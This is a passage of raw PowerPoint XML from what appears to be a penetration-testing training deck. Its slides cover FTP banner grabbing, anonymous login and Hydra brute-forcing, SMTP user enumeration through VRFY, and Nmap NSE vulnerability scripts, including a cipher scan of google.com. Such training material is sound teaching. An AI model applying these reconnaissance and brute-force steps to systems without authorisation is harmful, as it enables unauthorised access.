              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>snmpenum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>linux.txt</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>----------------------------------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	UPTIME</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>----------------------------------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>4 minutes, 14.62</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>----------------------------------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	RUNNING SOFTWARE PATHS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>----------------------------------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3920182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A59B-19AA-E641-B35B-0AC31028DDC0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>FTP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{293E82E3-BF64-914F-9D67-EEEAC530EBF6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When port 21 is open get the banner to see which FTP server is running</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Try to login with anonymous/anonymous</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use Hydra or similar brute force username/password tool as last resort</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2790325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1F85-11CC-8D49-B2D4-BE847F163D45}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SMTP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{23125E5C-29CE-D841-B4C3-87B6D622B02F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Get the banner of all email servers – exchange, pop3, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>imap</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use telnet to connect to the port</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use the VRFY command if it isn’t disabled to validate users</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3031571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0FB3-793C-474B-83F5-A4689228A647}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Vulnerability Scanning – Nmap</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3764CD2B-8EDA-654A-B0D3-743462D0B3C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>NSE scripts: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://svn.nmap.org/nmap/scripts</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Locate where NSE scripts are stored</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t># find / -name *.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nse</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t># locate *.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nse</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Place downloaded scripts in the directly listed above. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Default script folder /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/share/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/scripts .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> files go here</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Default Lib folder /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/share/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/lib - .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> files go here</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>After adding files you need to update the database</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> --script-updated</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3942037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0FB3-793C-474B-83F5-A4689228A647}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Vulnerability Scanning – Nmap</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3764CD2B-8EDA-654A-B0D3-743462D0B3C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Be cautious when running Nmap scripts they can easily break servers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Some scripts will need to set the unsafe argument to run </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>--script-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>args</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>=unsafe=1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Find scripts for vulnerability scanning</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t># ls –l /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>/share/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>/scripts *vuln*</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>rw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>-r--r-- 1 root root  7344 Aug 16 07:47 smb-vuln-ms17-010.nse</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>rw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>-r--r-- 1 root root  4400 Aug 16 07:47 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>smb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>-vuln-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>regsvc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>dos.nse</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>rw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>-r--r-- 1 root root  6586 Aug 16 07:47 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>smb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>-vuln-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>webexec.nse</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>rw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>-r--r-- 1 root root 14781 Aug 16 07:47 smtp-vuln-cve2010-4344.nse</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>rw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>-r--r-- 1 root root  7719 Aug 16 07:47 smtp-vuln-cve2011-1720.nse</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>rw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>-r--r-- 1 root root  7603 Aug 16 07:47 smtp-vuln-cve2011-1764.nse</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>rw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>-r--r-- 1 root root  7058 Aug 16 07:47 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>vulners.nse</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4292201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0FB3-793C-474B-83F5-A4689228A647}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Vulnerability Scanning – Nmap</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3764CD2B-8EDA-654A-B0D3-743462D0B3C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> -v </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>google.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> -p 443 --script=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>ssl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>enum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>-ciphers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>|   TLSv1.2: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>|     ciphers: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>|       TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA (ecdh_x25519) - A</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>|       TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA (ecdh_x25519) - A</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>|       TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384 (ecdh_x25519) - A</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>|       TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256 (ecdh_x25519) - A</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>|       TLS_RSA_WITH_3DES_EDE_CBC_SHA (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>rsa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> 2048) - C</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>|     warnings: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>|       64-bit block cipher 3DES vulnerable to SWEET32 attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="426917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29D0-0F86-A442-B8E9-EF9B157BF7E7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0"/>
              <a:t>Useful Links</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C6055BB7-707B-B643-9E46-A067A6E20EFD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Operating Systems with hacking tools</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Kali Linux: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://www.kali.org/downloads/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Parrot OS: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId4">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://parrotlinux.org/download-security.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Virtual Machines</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Samurai Dojo: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId5">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
